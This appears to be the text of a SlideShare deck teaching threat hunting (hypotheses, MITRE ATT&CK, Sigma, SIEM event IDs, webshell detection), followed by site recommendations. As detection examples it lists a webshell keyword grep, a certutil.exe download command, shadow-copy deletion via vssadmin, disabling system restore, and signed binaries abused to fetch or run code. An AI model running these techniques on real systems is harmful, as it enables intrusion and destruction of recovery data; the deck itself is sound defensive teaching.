SlideShare a Scribd company logo

Threat hunting in cyber world

Download as PPTX, PDF
A
Akash Sarode

This is about what is threat hunting and how to perform it in cyberworld. Our traditional detection systems are being bypassed and we need modern approach to detect & respond to modern day threats. Entire demo of the same is available on youtube - https://www.youtube.com/playlist?list=PL2iM-fIRjbTCQVI4tR7U2I5IdwLb2QSi_

Technology
1 of 50
THREAT HUNTING IN CYBERWORLD AKASH SARODE
AKASH SARODE @AKKY2892  Threat Hunter  Security researcher  Twitter - @Akky2892  Blog – https://akkysanj.wordpress.com  Github - https://github.com/akky2892  Creator of NoMoreMalware and HuntIT.  Author of multiple whitepapers – Machine learning- Learning cybersecurity, Threat hunting – Hunter or Hunted, Analysis Using Analytics In Cybersecurity.  Previous Training – Machine learning : The Future.
COURSE DESCRIPTION  Introduction to Threat Hunting  Threat Hunting Terminology  Threat Intelligence and IOC  Hunting methodology  Threat hunting - Network, Endpoint level  Operationalizing & Automating Threat hunting  Use case of Real-time Threat Hunting  Research & Resources  Further study and Road Ahead
COURSE INDEX 1. Introduction to Threat Hunting • Threat hunting in Cyberworld • Why to perform threat hunting 2. Terminologies in hunting 3. Introducing Threat Intelligence • Threat Intelligence and Threat Hunting = Intelligent hunting • Indicators of Compromise IOC 4. Threat Hunting methodology • Threat hunting process & Threat Hunting loop • Threat Hunting techniques • Pyramid of pain • Hunting Maturity model
COURSE INDEX 5. Network hunting and Endpoint hunting • Hunting Webshells • Hunting malware • Network traffic hunting 6. Using MITRE ATT&CK framework • Sigma rules for threat hunting 7. Threat Hunting using SIEM 8. Examples of Threat hunting hunts 9. Real World Hunting Process 10. Machine Learning & Threat Hunting – Advanced hunting 11. Threat Hunting Resources 12. Conclusion • Red Teamer cyber kill chain vs Blue teamer defense chain
INTRODUCTION TO THREAT HUNTING  The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.  My definition – Finding stuff.  Threat Hunting is not a Technology but Approach.  Data- driven approach rather than traditional alert-driven approach.  Applying our knowledge in an effective way to look out for any anomalies in the environment.  Two ways to perform hunting –  Manual  Automated/Machine-assisted
THREAT HUNTING IN CYBERWORLD  In Cyberworld, attackers are getting intelligent day-by-day.  Modern-day attacks cannot be prevented/detected by alerts generated from SIEM.  Need of hour – Next generation detection system.  Hunting – not tool dependent, its people dependent.  Machine Learning can help to certain extent but manual intervention in triage is always required.  Instead of reacting to attacks, lets start proactively looking for threats before attack happens.
WHY TO PERFORM THREAT HUNTING  Alert driven approach is not sufficient.  Hypothesis driven approach will be the future.  Dependency on tools should be eradicated.  Hunting can be performed on any tool.  Benefit - Continuous improvement in detection capabilites, find unknown malicious activity
TERMINOLOGIES IN THREAT HUNTING  SIEM – Security Information & Event management  IOC- Indicators of Compromise  TTP – Tools, Techniques & procedures  IR- Incident response  EDR – Endpoint detection and response  UEBA – User entity and behavior analytics  BIOC – Behavior indicators of compromise
THREAT INTELLIGENCE  Threat Intelligence are feeds which are received in the form of urls, files, domains, etc.  Can be used to perform intelligent hunting.  IOC’s of attack/threat are generated by various research companies.  Sources –  articles,  security news,  new APT public report,  Twitter
THREAT INTELLIGENCE  BIOC – Behavioral Indicators.  Threat Hunting is effective by proper intels.  Threat Intel team proposes new intel, CIRT team builds hypothesis and create detection based on intel, Threat hunting team hunts with or without intel.  Various vendors are in market- Cisco Talos, Palo alto Unit 42, Cylance, AlienVault OTX, MISP, Yara rules. Threat Intelligence + Threat Hunting = Intelligent Hunting
THREAT HUNTING METHODOLOGY  Different methods to perform threat hunting.  We will be explaining the following –  Threat Hunting process  Threat Hunting loop  Pyramid of pain  Hunting Maturity model  ATT&CK for hunts  Hunt or be Hunted
THREAT HUNTING PROCESS  Ways of hunting –  Manual – Analyst need to continuously looking for anything that could be evidence/indicator of intrusion.  Important for the threat hunter to keep current on the latest security research.  Automated/Machine-assisted – Analyst uses software that leverages “Machine Learning” and “UEBA” to inform analyst about potential risks.  • It helps in providing Predictive and Prescriptive analytics.
THREAT HUNTING PROCESS  Hypothesis driven approach  What is Hypotheses ?  Assumption on attack behavior.  Actionable use case based on observations, intelligence, and experience  Three types of hypotheses:  Analytics-Driven: "Machine-learning and UEBA, used to develop aggregated risk scores that can also serve as hunting hypotheses"[5]  Situational-Awareness Driven: "Crown Jewel analysis, enterprise risk assessments, company- or employee-level trends"[5]  Intelligence-Driven: "Threat intelligence reports, threat intelligence feeds, malware analysis, vulnerability scans"[  Hypothesis can be developed using any public APT report, twitter, security news, articles etc.
THREAT HUNTING PROCESS
THREAT HUNTING LOOP
THREAT HUNTING TECHNIQUES  Searching - use of specialized queries that return results and artifacts.  Clustering - machine learning model that uses advanced AI search techniques to make correlations within advanced and vast arrays of data.  Grouping – grouping artifacts together to identify any anomalies  Stack counting - stacking is how many times each unique value of column has occurred, like least commonly accessed file, rarity is suspicious.
PYRAMID OF PAIN
THREAT HUNTING MATURITY MODEL Source : sqrrl TMM
MITRE ATT&CK FRAMEWORK  MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.  It consists of TTP’s – Tactics, Techniques and procedures.  MITRE has also came up with a project name “CAR” Cyber Analytics Repository.  The Mitre team has listed down all those adversary behaviors and attack vectors carries out by an adversary on a victim machine.  It uses TTP’s Tactics, Techniques and Procedures and maps it to Cyber Kill chain.
MITRE ATT&CK FRAMEWORK
SIGMA RULES FOR THREAT HUNTING  Sigma is Generic Signature Format for SIEM Systems written by Florian Roth @Neo23x0 and Thomas Patzke.  Sigma is a generic and open signature format that allows you to describe relevant log events in a straight forward manner.  Sigma is for log files what Snort is for network traffic and YARA is for files.  Sigma rules contains mapping of all ATT&CK techniques.  Using sigma for threat hunting in siem, refer Sigma-to project:-  https://github.com/akky2892/Sigma-to
HUNTING WEBSHELLS  A web shell is a script written in the supported language of a target web server to be uploaded to enable remote access of the machine.  Mostly written in php or Asp  Multiple attack techniques can be used to upload webshell on webserver – XSS, SQL injection, RFI, LFI & many more…  Popular webshells – C99, R57, etc.  Let’s Hunt it!
HUNTING WEBSHELLS - KEYWORDS  First way for hunting webshells – Look out for reference to suspicious keywords within files on webserver - eval() or cmd.exe  For linux –  Under var/www/html directory, we can search for any php files with suspicious commands  find . –type ‘*.php’ | xargs egrep –l “(fsockopen|mail|exec|eval|system|base64_decode)”  For Windows –  Use Powershell to search in similar way  Get-childitem –recurse –include “*.php” | select-string “(fsockopen|mail|exec|eval|system|base64_decode)” | %{“$($._filename)”}
HUNTING WEBSHELLS - TOOLS  Multiple tools can be used to hunt for webshells in your environment. These tools are integrated with IOC’s , YARA rules to identify maliciousness.  LOKI IOC Scanner  PHP-Malware Finder  unPHP  Linux Malware detect  Invoke-ExchangeWebShellHunter  etc…  In addition to these techniques, we can also use baselines deviation and file stacking technique to hunt for webshell.
ENDPOINT HUNTING  Endpoint is where the malware behavior is more prevalent.  Most of the post-exploitation techniques can be hunted using Endpoint logs.  File activity, Registry activity, Process activity can be used to hunt out for any malicious behavior.  Multiple attack techniques such as DLL injection, hook injection, fuzzy hashing can be hunted down using endpoint logs.  ATT&CK MITRE is the best way to utilize the efforts and use these to hunt out for threats.
DLL HIJACKING  Post exploitation technique  Monitoring of Windows API calls, monitoring of windows registry path for any changes.  VirtualAllocEx reserves or changes a region of memory  WriteProcessMemory writes data to an area of memory in a specified process  CreateRemoteThread creates a thread in the address space of another process
APPININT DLLS  Powershell contains powersploit which can be used for code injection.  Monitoring malicous DLL loads - AppInit DLLs//// DLLs that are specified in the AppInit_DLLs value in the Registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows are loaded by user32.dll into every process that loads user32.dll.
NETWORK HUNTING  Network Traffic hunting requires network traffic logs.  Multiple tools can be used to analyze suspicious network traffic.  In addition to packet capturing, malicious traffic analysis features in Next Generation Firewall, UTM, IDS/IPS, we also need to hunt for traffic which has bypassed these devices.  Wireshark can be used.  Let’s look at simple example :-
NETWORK HUNTING – HTTPS TRAFFIC Normal HTTPS Suspicious HTTPS Port 443 or 8443 Malware use this port as well. Traffic is encrypted If traffic is not encrypted & secure socket layer packet details are empty, something suspicious Web server in FQDN format Server will point to IP address instead of FQDN HTTPS is Secure version -Secure socket Layer (SSL/TLS)
NETWORK HUNTING – HTTPS TRAFFIC
THREAT HUNTING USING SIEM  Threat Hunting is basically searching something.  We need to have proper & useful data to hunt for threats in enterprise.  SIEM – Security Information & Event Management is such tool which can prove to be useful in threat hunting.  SIEM collects logs from multiple devices of your network enterprise.  In addition to threat intelligence feeds, SIEM is very useful in querying the log database to identify any anomaly.  Let’s look at some of use cases:-
THREAT HUNTING USING SIEM Source : elastic.co
THREAT HUNTING USING SIEM Famous Email word/excel Macro attachments:- • Phishing email containing .doc with macro file • Macro contains script to initiate powershell.exe • Powershell.exe uses legitimate tools like mimikatz for credential dump for gaining hashes from memory. • What commands are executed using mimikatz.
THREAT HUNTING USING SIEM  Event viewer logs in SIEM can be useful to hunt for multiple threats.  Sysmon can be used to collect logs specific to endpoint systems based on defined configuration.  Search queries are useful in identifying any malicious behavior inside the enteprise environment.  In addition to threat intelligence and search queries, analytics is being used in SIEM which uses Machine learning to automatically identify any anomalies inside the environment.  We will look out for some examples of hunts to be clear -
THREAT HUNTING HUNTS Threat activity Hunts to look out for Hunting suspicious accounts See for any unusual accounts logged into machines with admin right – Event ID – 4672 (Special privileges assigned to new logon) Hunting Scheduled tasks Event ID – 4698, 106, 200 & 201 Hunting Pass the hash (PTH) Event ID- 4624 with logon type 3 Logon process – NtLmSsp, Key length – 0 Hunting for service creation Event ID- 4697 Hunting network shares Event ID - 4776 Hunting for process masquerading Look out for process path form where process is executing – Example explorer.exe should run from C:Windowsexplorer.exe or C:Windowssystem32explorer.exe
THREAT HUNTING HUNTS  PTH – Look for remote logins associated with execution/writing of binaries.  IFEOI – Changes to path - HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsxyz.exeDebugger  Rundll32.exe making connection to internet.  Deletion of shadow copy file using wmic, vssadmin | *delete
THREAT HUNTING HUNTS  Disable system restore - Registry Write and Key = HKLMSoftwareMicrosoftWindows NtSystemRestoreDisableSR and value = 1  Connection to process other than browser to suspicious domains like .tk, .onion,.tor2web etc.  Certutil.exe used to download files from internet - certutil.exe -urlcache -split -f http://example/file.txt
THREAT HUNTING HUNTS  Monitor scheduled tasks – at and schtasks windows task scheduler used to schedule scripts to be executed.  Double extensions malwares  Control.exe used to execute file stored in ADS.  Gpscript.exe used to executes logon scripts.  Mavinject.exe used to execute, read ADS files.  Hh.exe – executing and downloading files  Scriptrunner.exe – execution  Regsvr32.exe – Download script from internet All are windows signed binaries, so none of Endpoint protection will tag it.
THREAT HUNTING HUNTS  Similar to the discussed hunts, there are multiple techniques which can be used to hunt for threats.  A collection of many such techniques is collaborated and presented by ATT&CK MITRE & Sigma rules.  Hunting using SIEM is the way ahead but there are multiple SIEM vendors – RSA, Elasticsearch, Arcsight, Qradar etc.  In order to make life easy, I have prepared a Master Sheet of threat hunting hunts mapping it to respective SIEM vendors-  Query it & Hunt IT - https://github.com/akky2892/Sigma-to/blob/master/Sigma-to.xlsx
REAL WORLD HUNTING PROCESS What is threat hunting:- The human-centric process of proactively searching for evidence of attacks. Anyone can threat hunt; experienced threat hunters have better models. Threat hunting is the application of one or more models or frameworks to a problem. The easiest framework to start with is Attack Centric Hunting. In Attack centric hunting (ACH), you focus on seeking evidence that identifies a specific attack. It's a 4 step process that starts with a question.  1. Question - Has an Attack incident occurred on my network?  2. What am I looking for?  3. Where am I likely to find it?  4. How can I manipulate the data to find it?
REAL WORLD HUNTING PROCESS Example: Question: Has Credential theft happened on my network?  1. What am I looking for? a) Evidence of credential dumping application execution. b) never before seen processes, process anomalies.  2. Where am I likely to find it ? a) Windows process execution logs.  3. How can I manipulate the data to see it ? a) Aggregate EID 4688 by process name for all endpoints and sort by least frequent occurrence (LFO). (Event ID4688 = Process Execution event ID. )
MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING  Multiple SIEM vendors, or security product solutions uses Machine Learning or AI to assist threat hunting.  Machine learning uses Classification, Association algorithms to identify & detect any kind of anomalies in network.  Network traffic spike, unusual user account, computer account behavior, any deviation from baselines can be identified by such techniques.  Analytics is widely used in modern day world and it has find it place in Cyber security as well.  Microsoft Defender, Microsoft ATA, Qradar SIEM, Fireeye, etc.
MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING
MICROSOFT ATA Source: Microsoft.com
THREAT HUNTING RESOURCES  Threathunting.net  MITRE ATT&CK - attack.mitre.org  https://github.com/ThreatHuntingProject/ThreatHunting - David J Bianco  https://github.com/VVard0g/ThreatHunter-Playbook - Roberto Rodriguez (@Cyb3rWard0g)  https://blog.menasec.net  https://github.com/akky2892/Cyber-Threat-Hunting  Whitepapers, blogs, articles on threat hunting.  Research work on twitter - Oddvar Moe, Florian roth, Roberto rodriques, Olaf hangton, David J Bianco, sqrrl, Samir @ Sbousseaden & many more.  Sans – Threat Hunting Summit, defcon, Att&ckon, Derbycon, Nullcon Webinars/Webcasts …
CONCLUSION Red Teamer Cyber Kill Chain Blue Teamer Defense Chain Identify Preven t Detect Respond Recover
Thank You & Hunt IT !

Recommended

Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 

Recommended

Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshopArpan Raval
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersInfosec
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageRoss Wolf
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for BeginnersSKMohamedKasim
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
Threat Hunting Playbook.pdf
Threat Hunting Playbook.pdfThreat Hunting Playbook.pdf
Threat Hunting Playbook.pdflaibaarsyila
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshopprithaaash
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHaydn Johnson
 
Hunting malware with volatility v2.0
Hunting malware with volatility v2.0Hunting malware with volatility v2.0
Hunting malware with volatility v2.0Frank Boldewin
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Malware Analysis
Malware AnalysisMalware Analysis
Malware AnalysisRamin Farajpour Cami
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 

More Related Content

What's hot

PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshopArpan Raval
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersInfosec
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageRoss Wolf
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for BeginnersSKMohamedKasim
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
Threat Hunting Playbook.pdf
Threat Hunting Playbook.pdfThreat Hunting Playbook.pdf
Threat Hunting Playbook.pdflaibaarsyila
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshopprithaaash
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHaydn Johnson
 
Hunting malware with volatility v2.0
Hunting malware with volatility v2.0Hunting malware with volatility v2.0
Hunting malware with volatility v2.0Frank Boldewin
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 

What's hot (20)

PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshop
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for Beginners
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
Threat Hunting Playbook.pdf
Threat Hunting Playbook.pdfThreat Hunting Playbook.pdf
Threat Hunting Playbook.pdf
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshop
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
 
Hunting malware with volatility v2.0
Hunting malware with volatility v2.0Hunting malware with volatility v2.0
Hunting malware with volatility v2.0
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 

Similar to Threat hunting in cyber world

01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Huntpedia
HuntpediaHuntpedia
HuntpediaJc Sv
 
huntpedia.pdf
huntpedia.pdfhuntpedia.pdf
huntpedia.pdfCecilSu
 
Honeypot- An Overview
Honeypot- An OverviewHoneypot- An Overview
Honeypot- An OverviewIRJET Journal
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfssuser4237d4
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfssuser4237d4
 
A REVIEW PAPER ON ETHICAL HACKING
A REVIEW PAPER ON ETHICAL HACKINGA REVIEW PAPER ON ETHICAL HACKING
A REVIEW PAPER ON ETHICAL HACKINGNathan Mathis
 
CYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETCYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETTravarsaPrivateLimit
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defenceOWASP EEE
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET Journal
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hackDharmesh Makwana
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
AI for Cybersecurity Innovation
AI for Cybersecurity InnovationAI for Cybersecurity Innovation
AI for Cybersecurity InnovationPete Burnap
 
Ethical Hacking Overview
Ethical Hacking OverviewEthical Hacking Overview
Ethical Hacking OverviewSubhoneel Datta
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion TechniquesThomas Roccia
 

Similar to Threat hunting in cyber world (20)

Malware Analysis
Malware AnalysisMalware Analysis
Malware Analysis
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Huntpedia
HuntpediaHuntpedia
Huntpedia
 
huntpedia.pdf
huntpedia.pdfhuntpedia.pdf
huntpedia.pdf
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Honeypot- An Overview
Honeypot- An OverviewHoneypot- An Overview
Honeypot- An Overview
 
Super1
Super1Super1
Super1
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
 
A REVIEW PAPER ON ETHICAL HACKING
A REVIEW PAPER ON ETHICAL HACKINGA REVIEW PAPER ON ETHICAL HACKING
A REVIEW PAPER ON ETHICAL HACKING
 
CYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETCYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEET
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hack
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
AI for Cybersecurity Innovation
AI for Cybersecurity InnovationAI for Cybersecurity Innovation
AI for Cybersecurity Innovation
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 
Ethical Hacking Overview
Ethical Hacking OverviewEthical Hacking Overview
Ethical Hacking Overview
